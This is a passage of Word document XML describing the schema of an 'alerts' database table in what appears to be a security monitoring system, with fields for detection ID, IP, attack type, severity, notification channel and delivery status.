              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FE112D8" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="007257EA" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGSERIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential identifier of the notification decision.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT NOW()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Time the decision was made.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">detection_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FK → detections, ON DELETE SET NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection that triggered the decision.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip, attack_type, severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Copied from the detection for fast filtering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">telegram, email or dedupe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sent, failed, disabled (channel not configured) or suppressed (de-duplicated).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">message, error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
